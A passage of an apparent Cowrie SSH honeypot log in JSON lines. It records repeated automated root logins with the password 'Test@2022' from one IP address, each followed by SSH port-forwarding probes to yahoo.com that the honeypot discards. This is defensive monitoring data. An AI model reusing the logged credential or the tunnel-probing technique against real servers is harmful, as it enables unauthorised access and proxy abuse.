istp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.527706Z","src_ip":"213.209.150.239","session":"8ed0ab0cfcec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.762283Z","src_ip":"213.209.150.239","session":"8ed0ab0cfcec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":6700,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6700","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.810645Z","session":"8ed0ab0cfcec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.858410Z","src_ip":"213.209.150.239","session":"8ed0ab0cfcec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":27683,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:27683","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.993721Z","session":"8ed0ab0cfcec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.040948Z","src_ip":"213.209.150.239","session":"8ed0ab0cfcec"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.088809Z","src_ip":"213.209.150.239","session":"8ed0ab0cfcec"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53332,"dst_ip":"1.2.3.4","dst_port":22,"session":"40bbfdea66d1","protocol":"ssh","message":"New connection: 213.209.150.239:53332 (1.2.3.4:22) [session: 40bbfdea66d1]","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.144503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.145331Z","src_ip":"213.209.150.239","session":"40bbfdea66d1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.201932Z","src_ip":"213.209.150.239","session":"40bbfdea66d1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.483953Z","src_ip":"213.209.150.239","session":"40bbfdea66d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":9571,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9571","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.541467Z","session":"40bbfdea66d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.598257Z","src_ip":"213.209.150.239","session":"40bbfdea66d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":8525,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:8525","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.755048Z","session":"40bbfdea66d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.811671Z","src_ip":"213.209.150.239","session":"40bbfdea66d1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.869078Z","src_ip":"213.209.150.239","session":"40bbfdea66d1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53376,"dst_ip":"1.2.3.4","dst_port":22,"session":"7020bad77c2e","protocol":"ssh","message":"New connection: 213.209.150.239:53376 (1.2.3.4:22) [session: 7020bad77c2e]","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.915123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.916290Z","src_ip":"213.209.150.239","session":"7020bad77c2e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:45.963271Z","src_ip":"213.209.150.239","session":"7020bad77c2e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.197698Z","src_ip":"213.209.150.239","session":"7020bad77c2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":17152,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:17152","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.245849Z","session":"7020bad77c2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.293722Z","src_ip":"213.209.150.239","session":"7020bad77c2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":14553,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14553","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.429436Z","session":"7020bad77c2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.476411Z","src_ip":"213.209.150.239","session":"7020bad77c2e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.524213Z","src_ip":"213.209.150.239","session":"7020bad77c2e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53411,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8baa9084a24","protocol":"ssh","message":"New connection: 213.209.150.239:53411 (1.2.3.4:22) [session: e8baa9084a24]","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.570460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.571331Z","src_ip":"213.209.150.239","session":"e8baa9084a24"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.618326Z","src_ip":"213.209.150.239","session":"e8baa9084a24"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.853021Z","src_ip":"213.209.150.239","session":"e8baa9084a24"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":2331,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:2331","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.901014Z","session":"e8baa9084a24"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:46.948305Z","src_ip":"213.209.150.239","session":"e8baa9084a24"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":6336,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:6336","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.085491Z","session":"e8baa9084a24"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.132701Z","src_ip":"213.209.150.239","session":"e8baa9084a24"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.180540Z","src_ip":"213.209.150.239","session":"e8baa9084a24"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53445,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6e513422b25","protocol":"ssh","message":"New connection: 213.209.150.239:53445 (1.2.3.4:22) [session: c6e513422b25]","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.236176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.236827Z","src_ip":"213.209.150.239","session":"c6e513422b25"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.293485Z","src_ip":"213.209.150.239","session":"c6e513422b25"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.575498Z","src_ip":"213.209.150.239","session":"c6e513422b25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":9650,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9650","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.633632Z","session":"c6e513422b25"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.690522Z","src_ip":"213.209.150.239","session":"c6e513422b25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14343,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14343","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.847148Z","session":"c6e513422b25"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.903959Z","src_ip":"213.209.150.239","session":"c6e513422b25"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:47.961230Z","src_ip":"213.209.150.239","session":"c6e513422b25"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53507,"dst_ip":"1.2.3.4","dst_port":22,"session":"02e062434d40","protocol":"ssh","message":"New connection: 213.209.150.239:53507 (1.2.3.4:22) [session: 02e062434d40]","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.016803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.017698Z","src_ip":"213.209.150.239","session":"02e062434d40"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.074032Z","src_ip":"213.209.150.239","session":"02e062434d40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35604,"dst_ip":"1.2.3.4","dst_port":22,"session":"e165466a8bb9","protocol":"ssh","message":"New connection: 212.227.235.229:35604 (1.2.3.4:22) [session: e165466a8bb9]","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.234133Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.355409Z","src_ip":"213.209.150.239","session":"02e062434d40"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":27129,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:27129","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.412641Z","session":"02e062434d40"}
